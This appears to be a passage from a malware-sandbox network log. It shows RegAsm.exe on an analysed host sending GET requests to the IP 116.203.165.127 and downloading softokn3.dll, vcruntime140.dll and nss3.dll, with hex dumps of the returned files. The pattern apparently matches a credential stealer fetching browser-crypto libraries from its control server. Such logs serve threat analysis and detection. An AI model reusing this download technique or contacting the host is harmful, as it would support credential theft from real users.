2024-09-20 09:07:45 UTC	16384	IN	Data Raw: 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01 Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49752	116.203.165.127	443	7516	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-20 09:07:46 UTC	200	OUT	GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Connection: Keep-Alive Cache-Control: no-cache
2024-09-20 09:07:46 UTC	260	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Sep 2024 09:07:46 GMT Content-Type: application/octet-stream Content-Length: 257872 Connection: close Last-Modified: Friday, 20-Sep-2024 09:07:46 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-20 09:07:46 UTC	16124	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
2024-09-20 09:07:46 UTC	16384	IN	Data Raw: 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81 Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP\|*USWV1E0=(tM1(
2024-09-20 09:07:47 UTC	16384	IN	Data Raw: 03 45 dc 56 8d 4d ec 51 50 57 e8 55 9e ff ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d Data Ascii: EVMQPWUkWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM
2024-09-20 09:07:47 UTC	16384	IN	Data Raw: 88 41 02 0f b6 41 03 d1 e8 8a 80 68 f9 02 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00 Data Ascii: AAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q
2024-09-20 09:07:47 UTC	16384	IN	Data Raw: 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00 Data Ascii: 0{C!=P=Qt-=Rt=UG{{G\|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#
2024-09-20 09:07:47 UTC	16384	IN	Data Raw: 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74 Data Ascii: ]USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt
2024-09-20 09:07:47 UTC	16384	IN	Data Raw: 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4 Data Ascii: u ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$\|tu}Z=}]WM}EPVWSut&uGZ
2024-09-20 09:07:47 UTC	16384	IN	Data Raw: 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00 Data Ascii: uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
2024-09-20 09:07:47 UTC	16384	IN	Data Raw: 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c Data Ascii: ]]USWVu@$xTv4{F4^@KN@P\|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4\|
2024-09-20 09:07:47 UTC	16384	IN	Data Raw: c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49753	116.203.165.127	443	7516	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-20 09:07:47 UTC	204	OUT	GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Connection: Keep-Alive Cache-Control: no-cache
2024-09-20 09:07:48 UTC	259	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Sep 2024 09:07:48 GMT Content-Type: application/octet-stream Content-Length: 80880 Connection: close Last-Modified: Friday, 20-Sep-2024 09:07:48 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-20 09:07:48 UTC	16125	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"
2024-09-20 09:07:48 UTC	16384	IN	Data Raw: 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42 Data Ascii: t3MNB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;B
2024-09-20 09:07:48 UTC	16384	IN	Data Raw: 8b 45 94 a3 a4 f2 00 10 8d 45 cc 50 e8 39 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20 Data Ascii: EEP9Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt
2024-09-20 09:07:48 UTC	16384	IN	Data Raw: c9 00 08 00 00 83 e2 18 74 1c 83 fa 08 74 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12 Data Ascii: ttt@++t+t+u+uQ<0\|*<9&w/c5~bASJCtv
2024-09-20 09:07:48 UTC	15603	IN	Data Raw: 8f f8 b4 e9 00 40 03 d5 1c 16 4c d1 c1 d6 ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f Data Ascii: @L\|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicroso

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49754	116.203.165.127	443	7516	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-20 09:07:49 UTC	196	OUT	GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Connection: Keep-Alive Cache-Control: no-cache
2024-09-20 09:07:49 UTC	261	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Sep 2024 09:07:49 GMT Content-Type: application/octet-stream Content-Length: 2046288 Connection: close Last-Modified: Friday, 20-Sep-2024 09:07:49 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-20 09:07:49 UTC	16123	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
2024-09-20 09:07:49 UTC	16384	IN	Data Raw: f2 6b d2 64 89 c7 29 d7 c1 fb 15 01 f3 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51 Data Ascii: kd)i)ff f@U \|AAIQQAEq@AfAAi)\f fR \|9U\|&AVQ\|A@fAfAA1<MAQ
2024-09-20 09:07:49 UTC	16384	IN	Data Raw: 1b 10 51 e8 3d b8 06 00 83 c4 0c 66 83 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b Data Ascii: Q=fti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`\|$\tD$euL$PhD$TD$E
2024-09-20 09:07:49 UTC	16384	IN	Data Raw: 08 11 1e 10 40 a3 08 11 1e 10 3b 05 30 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 